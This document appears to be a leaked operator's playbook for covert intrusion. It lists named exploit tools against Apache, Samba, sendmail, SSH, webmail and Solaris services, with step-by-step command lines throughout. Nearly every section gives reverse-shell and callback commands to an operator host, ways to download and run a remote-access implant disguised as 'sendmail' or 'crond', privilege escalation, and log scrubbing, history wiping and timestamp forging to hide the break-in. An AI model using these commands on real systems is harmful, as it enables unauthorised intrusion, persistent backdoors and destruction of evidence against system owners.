### This one will send command results back to a netcat window (not interactive)
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 (/bin/uname -a; /usr/bi
n/id; /bin/ps -auxww; /bin/w)|/usr/
bin/telnet PITCH_IP NETCAT_PORT"
### This one gives you an interactive window:
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(sh</dev/tcp/PITCH_IP/
NETCAT_PORT>&0 2>&0)"
# or for ksh:
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(ksh -c "sh </dev/tcp/
PITCH_IP/NETCAT_PORT >&0 2>&0")"
### This one pops back an xterm (be patient for it to pop back and keep mouse cl
ear of window):
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "/usr/bin/X11/xterm -di
splay PITCH_IP:6 -e /bin/sh"
############ No Redirection:
./es.py TARGET_IP 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 (/bin/uname -a; /usr/bi
n/id; /bin/ps -auxww; /bin/w)|/usr/
bin/telnet LOCALIP NETCAT_PORT"
./es.py TARGET_IP 443 5000 HIT_STRING 0xbffffff0 0x4 0x0 "(/usr/bin/X11/xterm -d
isplay LOCALIP:0 -e /bin/sh)"
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(sh</dev/tcp/LOCAL_IP/
NETCAT_PORT>&0 2>&0)"
### if the exploit stalls after a bit, hit Ctl-C to wake it up, which
### prompts you if you want to continue - hit 'y'
### watch for a connection back to your netcat window
### Once you have access........
### you need to first clean extraneous processes started by httpd
### run this to help clean:
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
pwd
exec 3<&- 4<&- 5<&- 6<&- 7<&- 8<&- 9<&- 10<&- 11<&- 12<&- 13<&- 255<&-
/usr/sbin/lsof |grep ^sh
uname -a; id
mkdir -p /tmp/.httpd-lock; chmod 700 /tmp/.httpd-lock; ls -lctra /tmp
cd /tmp/.httpd-lock; pwd
#telnet PITCH_IP NETCAT_PORT </dev/tty | uudecode ; ls -la
#uncompress crond.Z; chmod 700 crond; ls -la
# if no uudecode, use this
### locally:
# nc -l -vv -p NETCAT_PORT < crond
### back on target window:

#/bin/cat</dev/tcp/PITCH_IP/NETCAT_PORT>/tmp/.httpd-lock/crond
chmod 700 crond
PATH=. crond
PATH=. D=-cPITCHIP:NOPEN_PORT crond
rm crond
-nstun TARGET_IP
-nrtun NOPEN_PORT
noclient TARGET_IP
### need to elevate so you can clean logs (use eventstart - ptrace won't work on
RH9)
### Logging:
-lt /var/log/httpd
/var/log/httpd/ssl_access_log
/var/log/httpd/ssl_request_log
/var/log/httpd/ssl_error_log
-lt /var/log
/var/log/messages
/var/log/secure
/var/log/maillog
egrep -v PITCH_IP /var/log/httpd/ssl_access_log > t; cat t > /var/log/httpd/ssl_
access_log
egrep -v PITCH_IP /var/log/httpd/ssl_request_log > t; cat t > /var/log/httpd/ssl
_request_log
egrep -v PITCH_IP /var/log/httpd/error_log > t; cat t > /var/log/httpd/error_log
egrep -v Segmentation /var/log/httpd/error_log > t; cat t > /var/log/httpd/error
_log
egrep -v PITCH_IP /var/log/httpd/ssl_error_log > t; cat t > /var/log/httpd/ssl_e
rror_log
egrep -v PITCH_IP /var/log/messages > t; cat t > /var/log/messages
egrep -v PITCH_IP /var/log/secure > t; cat t > /var/log/secure
egrep -v PITCH_IP /var/log/maillog > t; cat t > /var/log/maillog
####################################
### ENVELOPSWALLOW
####################################
# buffer overflow for Apache Web
Usage: ./envelopswallow <-switches> -h host[:80]

-h host[:port] Host to penetratea and TCP port of the web server to att
ack
-t # Target id.
Bruteforcing options (all required, unless -o is used!):
-o char Default values for the following OSes
(f)reebsd, (o)penbsd, (n)etbsd
-b 0x12345678 Base address used for bruteforce
Try 0x80000/obsd, 0x80a0000/fbsd, 0x080e0000/nbsd.
-d -nnn memcpy() delta between s1 and addr to overwrite
Try -146/obsd, -150/fbsd, -90/nbsd.
-z # Numbers of time to repeat \0 in the buffer
Try 36 for openbsd/freebsd and 42 for netbsd
-r # Number of times to repeat retadd in the buffer
Try 6 for openbsd/freebsd and 5 for netbsd
Optional stuff:
-w # Maximum number of seconds to wait for shellcode reply
-c cmdz Commands to execute when our shellcode replies
aka auto0wncmdz
-W # of seconds to wait between tries (use this when tunneling thru nopen)

-tunnel
l RANDOM TARGET_IP 80
r NETCAT_PORT
./envelopswallow
# plug in the options of the matching line
# change TARGET_IP to 127.0.0.1 if using redirection
# 4.0 FreeBSD RELEASE apache-1.3.12(distro binary) apache+mod_ssl-1.3.12+2
.6.2(distro binary)
# apache+php-1.3.12+3.0.15 (distro binary) apache+php-1.3.12+4.0b3 (distro
binary)
# apache+ssl-1.3.9+1.37(distro binary)
./envelopswallow -o f -w 1000 -b 0xbfbfd000 -d -134 -r 11 -z 16 -h TARGET_
IP:80
# 4.1 FreeBSD Apache 1.3.12(distro binary)
./envelopswallow -o f -w 1000 -b 0xbfbfd000 -d -134 -r 11 -z 16 -h TARGET_
IP:80
./envelopswallow -o f -w 1000 -b 0xbfbf0000 -d -134 -r 11 -z 16 -h TARGET_
:80
# 4.1 FreeBSD Apache 1.3.14 / 1.3.17 / 1.3.19 / 1.3.20 / 1.3.22 / 1.3.23 /

1.3.24 (built from source)
./envelopswallow -o f -h TARGET_IP:80 -w 1000 -b 0x080edc29 -d -146 -z 36
-r 6
# 4.4 FreeBSD Apache 1.3.20(binary)

./envelopswallow -b 0xbfbf0000 -z 16 -r 11 -d -134 -h TARGET_IP:80
# 4.4 FreeBSD ru-apache+mod_ssl-1.3.20+30.5+2.8.4 (distro binary)

./envelopswallow -b 0xbfbfd000 -z 16 -r 11 -d -134 -h TARGET_IP:80
# 4.5 FreeBSD apache+mod_ssl-1.3.22+2.8.5_4(distro binary) and apache-1.3.2

2_7 (distro binary)
./envelopswallow -b 0xbfbfd000 -z 16 -r 11 -d -134 -h TARGET_IP:80
### Let it run for about addresses (rows of PppP...ppP's) then bail if it doesn'
t hit
### maybe let it run an hour or less
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
telnet PITCH_IP NETCAT_PORT < /dev/console | uudecode;ls -la
netstat -an | grep RAT_PORT
D="-l RAT_PORT" PATH=. sendmail
### pitch window
-nstun TARGET_IP RAT_PORT
upload local: rforkx.freebsd (FreeBSD 4.1 & 4.3)

or sm11x.freeBSD ( ONLY for:
7.0, 7.1, FBSD 4.2
FBSD -t0
7.0 -t1
7.1 -t2
######################################
# RFORKX
######################################
### elevation for x86/FreeBSD
# Works-on :
# FreeBSD 3.1-RELEASE (GENERIC) #0: Mon Feb 15 11:08:08 GMT 1999
# FreeBSD 3.2-RELEASE (GENERIC) #0: Tue May 18 04:05:08 GMT 1999
# FreeBSD 3.3-RELEASE (GENERIC) #0: Thu Sep 16 23:40:35 GMT 1999
# FreeBSD 4.0-RELEASE (GENERIC) #0: Mon Mar 20 22:50:22 GMT 2000
# FreeBSD 4.1-RELEASE (GENERIC) #0: Fri Jul 28 14:30:31 GMT 2000
# FreeBSD 4.2-RELEASE (GENERIC) #0: Mon Nov 20 13:02:55 GMT 2000
### fails on some newer versions of FreeBSD
### upload executable

cp rforkx rf
packrat NETCAT_PORT rf
uncompress rf
ls -latr
chmod 700 rf
./rf
# wait 5 sec and maybe control-c
id
# start nopen as root then reconnect
######################################
# SM11X
######################################
Target platform 1: Red Hat Linux release 7.0 (Guinness)
ESMTP Sendmail 8.11.0/8.11.0
Target platform 2: Red Hat Linux release 7.1 (Seawolf)
Target platform 3: FreeBSD 4.2-RELEASE
Caldera Linux 3.1
Conectiva Linux 6.0
Conectiva Linux 7.0
Immunix Linux 7.0
SuSE Linux 7.0
SuSE Linux 7.1
SuSE Linux 7.2
"sendmail" daemon with any of the versions...
8.11
8.11.1
8.11.2
8.11.3
8.11.4
8.11.5
8.12.beta5
8.12.beta7
8.12.beta10
8.12.beta12
8.12.beta16
What assumptions have been made in the design of this capability?

Setuid "root" existence of "/usr/sbin/sendmail" on Red Hat Linux 7.0 and
7.1 systems, and "/usr/libexec/sendmail/sendmail" on FreeBSD-4.2 systems.
### LOGGING:
"/var/mail/maillog",
cat /etc/redhat-release
ls -l /usr/sbin/sendmail
./sm11x -t OPTION
### look for the cksums to match, if they don't, you have 5 secs to control-c
### if you don't control-c, a second 5-sec counter will start; you'll also see t
he following message:
Recipient names must be specified
###### Cleanup:
/var/log/messages (brute force)
/var/log/error_log (bus error, segment. fault, server seems busy)
###################################
# EGGBARON
###################################
### Linux and FreeBSD systems running Samba 2.2.x (pre 2.2.8a) on x86 architectu
res.
### If successful, it has samba start a listener on port 45295 and the exploit w
ill attempt
### to connect to it to give you root.
### If you're redirecting, you need to set up a tunnel to port 45295 on the targ
et,
### then connect to it via netcat.
### Note, that if you use the same ports on both tunnel ends, eggbaron may think
that it
### was already successful because of false positives by the tunnel
### Might need to let it give "failed" messages 20-30 times before it works.
./sambal
samba-2.2.x < remote root
--------------------------
Usage: ./sambal [-bBcCdfprsStv] [host]
-b <platform> bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and p
rior,
3 = OpenBSD 3.2)
-B <step> bruteforce steps (default = 300)
-c <ip address> connectback ip address
-C <max childs> max childs for scan/bruteforce mode (default = 40)
-d <delay> bruteforce/scanmode delay in micro seconds (default = 100000)
-f force
-p <port> port to attack (default = 139)
-r <ret> return address
-s scan mode (random)
-S <network> scan mode
-t <type> presets (0 for a list)
-v verbose mode
./sambal -t0
samba-2.2.x < remote root
--------------------------
01. samba-2.2.x - Debian 3.0 [0xbffffea2]
02. samba-2.2.x - Gentoo 1.4.x [0xbfffe890]
03. samba-2.2.x - Mandrake 8.x [0xbffff6a0]
04. samba-2.2.x - Mandrake 9.0 [0xbfffe638]
05. samba-2.2.x - Redhat 9.0 [0xbffff7cc]
06. samba-2.2.x - Redhat 8.0 [0xbffff2f0]
07. samba-2.2.x - Redhat 7.x [0xbffff310]
08. samba-2.2.x - Redhat 6.x [0xbffff2f0]
09. samba-2.2.x - Slackware 9.0 [0xbffff574]
10. samba-2.2.x - Slackware 8.x [0xbffff574]
11. samba-2.2.x - SuSE 7.x [0xbffffbe6]
12. samba-2.2.x - SuSE 8.x [0xbffff8f8]
13. samba-2.2.x - FreeBSD 5.0 [0xbfbff374]
14. samba-2.2.x - FreeBSD 4.x [0xbfbff374]
15. samba-2.2.x - NetBSD 1.6 [0xbfbfd5d0]
16. samba-2.2.x - NetBSD 1.5 [0xbfbfd520]
17. samba-2.2.x - OpenBSD 3.2 [0x00159198]
18. samba-2.2.8 - OpenBSD 3.2 (package) [0x001dd258]
19. samba-2.2.7 - OpenBSD 3.2 (package) [0x001d9230]
20. samba-2.2.5 - OpenBSD 3.2 (package) [0x001d6170]
21. Crash (All platforms) [0xbade5dee]
# EGGBARON may not work the first time using the target number as the -t flag.
# Try bruteforcing it using the -b flag. This usually works, and after very few
tries.
# If this is taking a long time, try setting the bruteforce step size down using
-b 100.
# Subsequently, the -t flag will work
./sambal -b 0 TARGET_IP
####### redirected:
### via pitch:
-tunnel
l 1139 TARGET_IP 139
r NETCAT_PORT
### Locally:
./sambal -p 1139 -b 0 127.0.0.1
./sambal -f -p 1139 -b 0 127.0.0.1
# skip to nc section
### Thru a windows box:

### 1. Need a 2 second delay (-d 2000000)
### 2. Need three tunnels (exploit, nc to port 45295, and callback to upload RA
T)
background redirect -tcp -lplisten 4444 -target 10.1.1.3 45295 -bind WINDOWS_LOC
AL
background redirect -tcp -lplisten 1139 -target 10.1.1.3 139 -bind WINDOWS_LOCAL
background redirect -tcp -implantlisten 25896 -target LOCAL_UNIX 25896 -nodes 40
### If you think you can't contact the target directly and want the exploit to
### call back to you, use the "-c WINDOWS_TARG_CALLBACK" option, and start
### a windows tunnel and unix netcat listener on port 45295
### Even if the "-c WINDOWS_TARG_CALLBACK" is used, both a callback to port 4529
5 _AND_
### a listener on the target's port 45295 will be created
### Locally:
./sambal -t0
./sambal -r 0xbffffb00 -b 0 -B 300 -v -c WINDOWS_TARG_CALLBACK -C 1 -f -d 200000
0 -p 1139 WIN_LOCAL
./sambal -r 0xbffffd00 -b 0 -B 300 -v -c WINDOWS_TARG_CALLBACK -C 1 -f -d 200000
0 -p 1139 WIN_LOCAL
### try connecting via netcat after any "session failed" message when redirectin
g:
nc PITCH_IP_or_WINDOWS_LOCAL 4444
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
w
uname -a
### start a netcat with the right nopen version (don't need to uuencode with /de
v/tcp way)
### nc -l -v -p NETCAT_PORT < sendmail
pwd
mkdir /tmp/.scsi; cd /tmp/.scsi; pwd
ls -l /usr/bin/uudecode
/bin/cat</dev/tcp/WINDOWS_TARG_CALLBACK/NETCAT_PORT>/tmp/.scsi/sendmail
chmod 700 sendmail
PATH=. sendmail
id
### Cleanup
# look for stray process in netstat (bunch of funky chars followed by /bin/sh on
port 45295)
# then kill the associated process running it:
netstat -anlp | grep 45295
ps -ef |grep <PID>
kill -9 <PID>
# Logging depends on OS; usually indicated in smb.conf file or check:

# /var/log/samba/smb.log, /var/log/samba/<machine-name>.log
###
##################################################
# EXTRANEOUSMONKEY
##################################################
-tunnel
l 443 TARGET_IP
### verify the exploit will work with a test command:
./em -i 127.0.0.1 -t 2 -u "w; date; date -u; uname -a"
### next, run this one using the proper noclient & noserver
### nopen will be started as httpd owned by apache
### you'll connect in the / directory
./em -i 127.0.0.1 -t 2 -s /current/up/noserver -c /current/bin/noclient
-cd /tmp
-lt
uname -a
### start another nopen listener on a random port (not reusing the socket)
unset I; PATH=. D=-l38475 .httpd
### from redirector

-nstun TARGET_IP:38475
### elevate using your favorite local (probably EVENTSTART), then start
### another privileged noserver, connect to it, then clean up
### Logging:
/var/log/httpd/ssl_error_log
/var/log/httpd/access_log
/var/log/httpd/ssl_access_log
/var/log/httpd/ssl_request_log
##############################################################################
### EXPIRETRACHEA
#############################################################################
# close to freebsd 4.3
# copy nopen for freebsd 4.3 as noserver in /current/up; automatically uploads a
nd connects
-scan mail TARGET_IP
# returns BorderWare MXtreme Mail Firewall
#cgi-bin/remote/expiretrachea/i586-pc-linux-gnu/opscript.borderware
#expiretrachea_helper.pl
#expiretrachea.pl -h hostname -c PITCH_IP
### redirected:
-tunnel
l 80 TARGET_IP
r 25
# 1st window
expiretrachea_helper.pl -c PITCH_IP
# 2nd window
expiretrachea.pl -h 127.0.0.1 -c PITCH_IP
# clean logs:
### /server/ftp/log/httpd: referer_log, ssl_request_log, and access_log
#grep -v "-" /server/ftp/log/httpd/referer_log > /tmp/.scsi/c; cat /tmp/.scsi/c
> /server/ftp/log/httpd/referer_log
pwd
-lt /server/ftp/log
-lt /server/ftp/log/httpd
-lt /
df -k
w
ps -auxww
-cd /var/tmp
-get /server/ftp/log/messages
-tail /server/ftp/log/messages
grep -v DSADMIN /server/ftp/log/messages > m; cat m > /server/ftp/log/messages
grep -v PITCH_IP /server/ftp/log/messages > m; cat m > /server/ftp/log/messages
-get /server/ftp/log/httpd/referer_log
-tail /server/ftp/log/httpd/referer_log
grep -v prepend /server/ftp/log/httpd/referer_log > m; cat m > /server/ftp/log/h
ttpd/referer_log
grep -v x90 /server/ftp/log/httpd/referer_log > m; cat m > /server/ftp/log/httpd
/referer_log
grep -v admin /server/ftp/log/httpd/referer_log > m; cat m > /server/ftp/log/htt
pd/referer_log
grep -v C /server/ftp/log/httpd/referer_log > m; cat m > /server/ftp/log/httpd/r
eferer_log
-get /server/ftp/log/httpd/access_log
-tail /server/ftp/log/httpd/access_log
grep -v PITCH_IP /server/ftp/log/httpd/access_log > m; cat m > /server/ftp/log/h
ttpd/access_log
-get /server/ftp/log/httpd/ssl_request_log
-tail /server/ftp/log/httpd/ssl_request_log
grep -v PITCH_IP /server/ftp/log/httpd/ssl_request_log > m; cat m > /server/ftp/
log/httpd/ssl_request_log
-get /server/ftp/log/httpd/error_log
-tail /server/ftp/log/httpd/error_log
grep -v PITCH_IP /server/ftp/log/httpd/error_log > m; cat m > /server/ftp/log/ht
tpd/error_log
grep -v db_sql /server/ftp/log/httpd/error_log > m; cat m > /server/ftp/log/http
d/error_log
-rm m
-rm /tmp/.scsi/sendmail /tmp/.scsi/getopt /tmp/.scsi
-lt
###################################################
### NFTP
###################################################
# nopen ftp
############
ourtn -lue PITCH_IP
noclient PITCH_IP:PORT
-tunnel 12121 udp # NOTE: As of v1.1, if this is not there, the
error message will offer it as a pastable.
# In the LOCAL window, use nftp to transfer a file in both directions

# via NOPEN redirection to PITCH_IP in regular mode (-d and -V are
# optional and give more debugging/verbose information):
nftp -r PITCH_IP -d -V TARGET_IP
# pnftp -r PITCH_IP -d -V TARGET_IP
user
password
ls
cd /bin
lcd ../down
#get vi
cd /tmp
#put vi vi.test1
bye
#######################################
### ELITEHAMMER
#######################################
### Runs against RedFlag Webmail 4 (software install)
### Gives you user nobody, not root;
### Need a local to get root (EVENTSTART or ELASTICBANJO?)
### Webmail port is usually 80 or 443
-scan ssl TARGET_IP
-scan 8025 TARGET_IP
### This version will reuse the same port for the nopen upload and the nopen cal
lback:
### Redirector:
-tunnel
l WEBPORT TARGET_IP
r CALL_BACK_PORT
### In two scripted local windows, run the following:
### 1st window
###./elitehammer_helper.pl -c <callbackip> -p <callbackport> [-n path to noserve
r <default: ../up/noserver>] [-s sleep secs <default: 5>]
./elitehammer_helper.pl -c PITCH_IP -p CALL_BACK_PORT
### 2nd window
###./elitehammer.pl -h <targetip> -m <target's web port> -c <callbackip> -p <cal
lback port> [-l if https]
./elitehammer.pl -h 127.0.0.1 -m WEBPORT -c PITCH_IP -p CALL_BACK_PORT
### Troubleshooting Elitehammer

### If you throw the exploit and just see the first connection,
### a firewall might be blocking certain outbound ports
-tunnel
l 8888 TARGET_IP mailport
r 53
r 25
r 110
r 80
r 443
r 21
r 22
r 23
### Locally, setup nc for each of the above ports to see what target will allow
### out (53,25,110,80,443,21,22,23)
nc -l -p NETCAT_PORT
### Then surf the following in a web browser and watch your netcat window for a
connection:
http://127.0.0.1:8888/mod_password.php?cfg_m_function=http://PITCH_IP:NETCAT_POR
T
### Once you've identified a port allowed out, change the CALL_BACK_PORT in your
tunnels and
### commands aand try again
### Once successful, you'll be connected in a nopen window as user nobody
-lt
id
-cd /tmp/.scsi
-lt
uname -a
w
### more windows
# noclient -l CALL_BACK_PORT
# PATH=. D="-cPITCH_IP:CALL_BACK_PORT" sendmail
### Choose your poison for elevation (EVENTSTART, ELASTICBANJO, others)
### Clean up
/webmail4/www/logs/access_log
-lt /webmail4/www/logs
-grep PITCH_IP /webmail4/www/logs/access_log
grep -v PITCH_IP /webmail4/www/logs/access_log > m; cat m > /webmail4/www/logs/a
ccess_log
touch -t YYMMDDHHMM.ss /webmail4/www/logs/access_log
-lt /webmail4/www/logs/access_log
-rm m
-cd /tmp
-rm .scsi
#######################################
### ELASTICBANJO
#######################################
### Elevates to root; make suren redmin is there
-lt /usr/share/redmin/cgi/redmin
### must use /tmp/.scsi directory
-cd /tmp/.scsi
-put /current/up/gr.tbz2 gr.tbz2
tar xvfj gr.tbz2
-shell
id
./gr
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
id
pwd
cd /tmp/.scsi
#PATH=. sendmail
#noclient -l NOPEN_PORT
#PATH=. D="-cPITCH_IP:NOPEN_PORT" sendmail
exit
exit
### Clean up
/var/log/rflogview/system_info
/var/log/cron
/var/spool/at/.SEQ
/tmp/1
-lt /tmp
-rm /tmp/1
-lt /var/spool
-lt /var/spool/at
-cat /var/spool/at/.SEQ
# decrement the number in the file by 1
#echo 00000 > /var/spool/at/.SEQ
#echo NUMBER > /var/spool/at/.SEQ
chown daemon:daemon /var/spool/at/.SEQ
-cat /var/spool/at/.SEQ
-lt /var/spool/at
-touch /var/spool /var/spool/at/.SEQ
-touch /var/spool /var/spool/at/spool
-touch /var/spool /var/spool/at
-lt /var/log/cron
-grep LIST /var/log/cron
# all should be from us
-gs grepout LIST /var/log/cron
#grep -v LIST /var/log/cron > m; cat m > /var/log/cron
-lt /var/log/rflogview
-tail /var/log/rflogview/system_info
-grep LIST /var/log/rflogview/system_info
-gs grepout LIST /var/log/rflogview/system_info
# grep -v LIST /var/log/rflogview/system_info > m; cat m > /var/log/rflogview/sy
stem_info
-lt / /var/run /var/log
# check history files for root and user you elevated from
-rm m sendmail
-cd /tmp
-rm /tmp/.scsi
########## Adding/Deleting ipchains rules to scan/exploit internal targets ###
# specifically used for jogswirl *.133u, .132u)
# on target
-ifconfig
ipchains -L -n --line-numbers > L:/current/down/ipchains.lnumbers-orig
ipchains -L -n --line-numbers
# locally
./fw-ipchains -h
./fw-ipchains -s 172.16.80.19 -d 172.16.0.0/16
# on target
# copy/paste add rules (tcp/udp...) from fw-ipchains output
# scan/exploit targets
# copy/paste delete rules (tcp/udp...) from fw-ipchains output
ipchains -L -n --line-numbers > L:/current/down/ipchains.lnumbers-clean
# locally
cd /current/down
diff ipchains.lnumbers-orig ipchains.lnumbers-clean
# make sure -orig and -clean look the same; resetting rules to original state:q
###################################################3
# KWIKEMART
###################################################3
# SSH-1.5-1.2.27
# SSH-1.5-OpenSSH-1.2.3
# SSH-1.99-OpenSSH_2.1.1
# SSH-1.99-OpenSSH_2.2.0
telnet TARGET_IP <sshd port>
./km* -t
./km -t0
./km.e -t0
./km -t2 TARGET_IP 22
# CLEAN UP
/var/log/messages
/var/log/auth
##################################################3
############################################################
# SSH
############################################################
### get nopen ready to paste with gedit:

compress sendmail
uuencode sendmail.Z sendmail.Z > sendmail.Z.uu
gedit sendmail.Z.uu
### redirector
-tunnel
l 22 TARGET_IP
# Multiple targets? If so, wipe your known_hosts file locally between each:
cat /dev/null > ~/.ssh/known_hosts
ssh -x iga@127.0.0.1 "/bin/sh"
# or
ssh -p RANDOM_PORT -x username@127.0.0.1 /bin/sh
# or this eliminates the lack of tty problem
ssh -p RANDOM_PORT -x username@127.0.0.1
unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
w
id
uname -a
ls -la /boot
mkdir /tmp/.scsi;cd /tmp/.scsi;pwd
# gedit sendmail
uudecode; ls -la
# LINUX:
# start nopen so you can upload forkpty to be able to su (ptrace didn't work)
-put forkpty f
./f
# or:
su
############## upload nopen:
###
### using uudecode pastable
###
# if no uuencode and no ftshell (if you used telnet) try:
# locally run:
uudecode.pastable /current/up/morerats/noserver-3.0.3.1-i586.pc.linux.gnu.redha
t-5.0 sendmail
# paste the perl code that it spits out (hitting return after the last character
), then
# paste sendmail that is brought up in gedit
# you may need to hit Ctl-C after you see the upload complete
# Note: the upload may not echo to the screen until after the Ctl-C
###
### using cat & /dev/tcp:
###
# on redir:
-tunnel
r RANDOM
# netcat
nc -l -v -p RANDOM < sendmail
# on target:
cat /dev/tcp/PITCH_IP/RANDOM > sendmail
###
### using wget:
###
# If none of the above work:
# Locally:
echo -e 'HTTP/1.0 200\n' > new
cat new ../up/morerats/noserver-2.6.1-i586.pc.linux.gnu.redhat-5.0 > /current/up
/sendmail
nc -l -v -p RANDOM < sendmail
# on redir:
-tunnel
r RANDOM
# on target
wget http://210.56.8.10:RANDOM/sendmail
ls -la
chmod 700 sendmail
PATH=./sendmail
-nstun TARGET_IP
###
### using secure copy
###
# if that doesn't work, try secure copy:
# on redir:
-tunnel
# in a local scripted window:

cd /current/up
cp /current/up/noserver crond
scp -P RANDOM crond username@127.0.0.1:/tmp/.scsi/crond
# enter passwd at the prompt
###
### Want netcat? netcat nc -- how abuot perl instead?
### using target's perl to open a socket, either
### callback or listen on target.
###
my
:%s/PERLNAME/PERLNAME/g
:%s/PERLRANDOMPORT/PERLRANDOMPORT/g
:%s/PERLCALLBACKIP/PERLCALLBACKIP/g
:%s/PERLCALLFORWARDIP/PERLCALLFORWARDIP/g
:%s,PERLUPLOADFILE,PERLUPLOADFILE,g
`y
#### CALLING out from target
# LOCALLY use netcat to upload file
nc -vv -l -p PERLRANDOMPORT < PERLUPLOADFILE
# or if you want a loop to keep listening after each upload
while [ 1 ] ; do \
echo starting listen on PERLRANDOMPORT ; \
date ; \
nc -vv -l -p PERLRANDOMPORT < PERLUPLOADFILE; \
echo done ; \
sleep 3 ; \
done
# tunnel
-tunnel
r PERLRANDOMPORT
# ON TARGET
perl -MIO -e 'close(STDIN);$c=IO::Socket::INET->new("PERLCALLBACKIP:PERLRANDOMPO
RT")or exit1;binmode($c);open(O,">PERLNAME")or exit 1;binmode(O);select O;$|=1;
print O while (<$c>);close(STDOUT);close($c);unlink("PERLNAME") unless (-s "PERL
NAME");'
### LISTENING on target

# ON TARGET
perl -MIO -e '$s=new IO::Socket::INET(LocalPort,PERLRANDOMPORT,Reuse,1,Listen,10
) or exit 1; $c=$s->accept() or exit 1;open(O,">PERLNAME")or exit 1;select O;$|=
1;print O while <$c>;close(O);close($c);unlink("PERLNAME") unless (-s "PERLNAME"
);'
# tunnel
-tunnel
l PERLRANDOMPORT PERLCALLFORWARDIP
# LOCALLY
nc -vv 127.0.0.1 PERLRANDOMPORT < PERLUPLOADFILE
###
### to elevate using EVENTSTART(?) use whatever name you want
###
-put /current/up/h h
# in your ssh or telnet masquerade window:
./h
unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
id
cd /tmp/.scsi;pwd
chmod 700 sendmail
chown root:root /tmp/.scsi
PATH=. sendmail
### in another window
-nstun TARGET_IP 32755
-rm sendmail
##### Don't forget to burn the unprivileged nopen
# Cleanup
/var/log/secure
/var/log/messages
/var/log/lastlog
/var/log/wtmp
/var/run/utmp
###########################################################
# BOSSLAD
###########################################################
### when nsrexec is there but NOT with nsrstatd???
### like a tcp version of BS
### always uses port 7937
### ./bll.tnc.gr
# Before running this script, you first need to run the following:
# nc -l -p localPort < file2Xfer&Run.uu
# (nc must be in your path; it's also run w/in this script)
# where file2Xfer&Run.uu is a compressed, uuencoded file.
# Usage: bll.tnc.gr
# [options] -- [options to <file2Xfer&Run>]
# -i <target ip> (required)
# -l <callback ip> (required)
# -p <callback port> def = 32177
# -f <file2Xfer&Run> (required)
# -D <remoteDir> def= /tmp/.X11R6
#
# ./bll.tnc.gr -i 66.128.32.67 -l 67.233.61.230 -p 24792 -f sendmail -D /tmp/.sc
si
packrat NETCAT_PORT
### On redirector:
-tunnel
l 7937 TARGET_IP
r NETCAT_PORT
### On local machine:
### Ex.: ./bll.tnc.gr -i 127.0.0.1 -l 150.27.1.11 -p 45226 -f sendmail -D /tmp/
.scsi
./bll.tnc.gr -i 127.0.0.1 -l PITCH_IP -p NETCAT_PORT -f RAT_NAME -D /tmp/WORK_DI
R
### Once upload of RAT completes, connect to target from PI with nopen:
-nstun TARGET_IP
### Cleanup
-ls /nsr/cores
-ls /nsr/cores/sh
-cat /nsr/cores/sh/*
rm /nsr/cores/sh/*
-rm /nsr/cores/sh
-touch SOMEFILE /nsr/cores
-ls /nsr/logs
-ls /nsr/logs/daemon.log
-get /nsr/logs/daemon.log
wc -l /nsr/logs/daemon.log
head -## /nsr/logs/daemon.log > n
-cat n
cat n > /nsr/logs/daemon.log
touch SOMEFILE /nsr/logs/daemon.log
#########################################################
# ELVISCICADA
#########################################################
### only up to ealry Sol2.9; Sol2.10 not vulnerable
### snmpXdmid (/usr/lib/dmi/dmispd) daemon program (RPC program 300598 version 1
)
# Req:
# 1. you must know the OS
# 2. you must ba able to connect with TCP (for when you get the root shell)
# 3. /usr/lib/dmi/dmispd must be running on the target system,
# and you must be able to successfully talk to its ___UDP___ port.
# This is usually evidenced by RPC program 300598 version 1
# during rpcinfo -p and UDP rpcinfo -n "touches" of the target, such as...
#
# $ rpcinfo -p target
# ...
# 300598 1 udp 32879
# 300598 1 tcp 32796
# ...
# $ rpcinfo -n 32879 -u target 300598
# program 300598 version 1 ready and waiting
# $
#
# if rpcinfo -n returns "ready and waiting", ELVISCICADA should be ready to sin
g.
### -scan brpc TARGET_IP
### look for program 300598 version 1 of dmispd and make note of UDP port
### test that TCP connects get thru to the default shellcode port (32387)
### (being refused is still good - means it went thru)
### If the port doesn't answer, pick another port that works, AND add the "-s" o
ption
### using the new (random) port
# ON PI:
-tunnel
l 32387 TARGET_IP
# Locally
telnet 127.0.0.1 32387
### Usage:
./dw.linux
### Use the lowest number for the target OS and increment by one for subsequent
attempts:
./dw.linux -t <VALUE> -i TARGET_IP -s RANDOMSHELLPORT -p UDPPROGRAMPORT
./dw.linux -t <VALUE> -i TARGET_IP -p UDPPROGRAMPORT
### If redirected:
# On PITCHIMPAIR
-tunnel
l RANDOMSHELLPORT TARGET_IP
u PROGRAMPORT TARGET_IP
r NETCATPORT
# Locally:
./dw.linux -t <VALUE> -i 127.0.0.1 -s RANDOMSHELLPORT -p UDPPROGRAMPORT -w 10 -b
1024
./dw.linux -t <VALUE> -i 127.0.0.1 -p UDPPROGRAMPORT
### Once you have root, get nopen up there:

### on PITCHIMPAIR
-tunnel
r NETCAT_PORT
### On target:
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
### pitch window
### Restart both dmispd daemons before leaving the target:
ps -ef |grep dmi
exec 3<&- 4<&- 5<&- 6<&- 7<&- 8<&- 9<&-
rpcinfo -d 300598 1
/etc/rc3.d/S77dmi stop < /dev/console 2>&1 >/dev/null
/etc/rc3.d/S77dmi start < /dev/console 2>&1 >/dev/null
ps -ef |grep dmi
### should see something like this:
# root 580 399 0 12:48:18 ? 0:00 grep dmi
# root 577 1 0 12:48:18 ? 0:00 /usr/lib/dmi/snmpXdmid -s target
# root 573 1 0 12:48:18 ? 0:00 /usr/lib/dmi/dmispd
### Cleanup:
